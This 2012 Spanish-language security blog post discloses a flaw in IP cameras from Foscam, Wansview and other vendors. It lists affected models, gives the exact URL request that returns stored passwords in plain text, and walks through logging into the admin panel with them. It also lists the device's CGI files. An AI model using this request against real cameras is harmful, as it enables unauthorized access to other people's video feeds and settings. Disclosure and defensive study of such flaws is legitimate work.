16 oct. 2012

Bug en varios modelos de cámaras IP dejan acceder a las contraseñas en texto plano y al panel de administración

Se ha dado a conocer una grave vulnerabilidad por la que una gran variedad de modelos populares de cámaras IP dejarían al descubierto en texto plano todas las contraseñas de usuarios tanto de las asociadas al servicio, como FTP o mail.

Por el momento, son 11 los fabricantes afectados y estos algunos de los fabricantes y modelos vulnerables:
  • FOSCAM - FI9820W, FI9802W, FI8608W, FI8601W FI8602W, FI8620, FI8609W, FI8919WZ
  • WANSVIEW - NCH-536MW, NCH536MW, NCH-532MW, NCH532MW, NCH-531MW, NCH531MW
  • Suneyes - SP-HS05W, SP-HS02W
  • DBPOWER - H.264 HD MEGAPIXEL IPCAM
  • AGASIO - A522W, A622W
  • DERICAM - H501W
  • DSN-Q10
  • NVH-589MW
  • ASTAK MOLE
  • EasyN - HS-691
  • EasySE - H2

La forma de explotarla es bastante simple, teniendo el host de una cámara IP antes mencionadas, tenemos que poner lo siguiente:
http://host:port/web/cgi-bin/hi3510/param.cgi?cmd=getuser

Miren este ejemplo:

 Ponemos como antes dije http://host:port/web/cgi-bin/hi3510/param.cgi?cmd=getuser y nos aparecen las credenciales:

 Ahora accedemos a http://host:port/web/admin.html y ponemos el usuario y contraseña que encontramos en texto plano:

Y así de simple accedimos al panel de administración:




 

Bueno, esa es la forma rápida y fácil de hacerlo, pero existen muchos más vectores de ataques, por si les interesa les dejo el manual oficial CGI User Manual donde hay muchos más parámetros que se pueden usar.

Por si les interesa les dejo el contenido de http://host:port/cgi-bin/:
0KB      2011-10-18 06:01:47  adsl_init.cgi
0KB      2011-09-01 11:56:40  chkwifi.cgi
0KB      2011-10-18 06:01:47  ddns_start.cgi
1KB      2011-10-18 06:01:47  getadslattr.cgi
0KB      2011-10-18 06:01:47  getddnsattr.cgi
1KB      2011-10-18 06:01:47  getinetattr.cgi
0KB      2011-09-01 11:56:40  getinterip.cgi
0KB      2011-09-01 11:56:40  getnettype.cgi
145KB   2011-10-18 06:01:47  getupnp.cgi
145KB   2011-09-01 11:56:40  getwifi.cgi
1KB      2011-10-18 06:01:47  getwifiattr.cgi
0KB      2011-09-01 11:56:40  ptzctrldown.cgi
0KB      2011-09-01 11:56:41  ptzctrlleft.cgi
0KB      2011-09-01 11:56:40  ptzctrlright.cgi
0KB      2011-09-01 11:56:40  ptzctrlup.cgi
0KB      2011-09-01 11:56:41  ptzctrlzoomin.cgi
0KB      2011-09-01 11:56:40  ptzctrlzoomout.cgi
2KB      2011-09-01 11:56:40  ser.cgi
4KB      2011-10-18 06:01:47  setadslattr.cgi
2KB      2011-10-18 06:01:47  setddnsattr.cgi
3KB      2011-10-18 06:01:47  setinetattr.cgi
2KB      2011-10-18 06:01:47  setwifiattr.cgi
2KB      2011-09-01 11:56:41  testwifi.cgi
145KB   2011-10-18 06:01:46  upnp_start.cgi
145KB   2011-10-18 06:01:46  upnp_stop.cgi
145KB   2011-10-18 06:01:47  wifi_start.cgi
145KB   2011-10-18 06:01:47  wifi_stop.cgi

Aquí hay un foro de discución donde saque la mayoría de los hints: http://forum.hardware.fr/

Referencias:

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.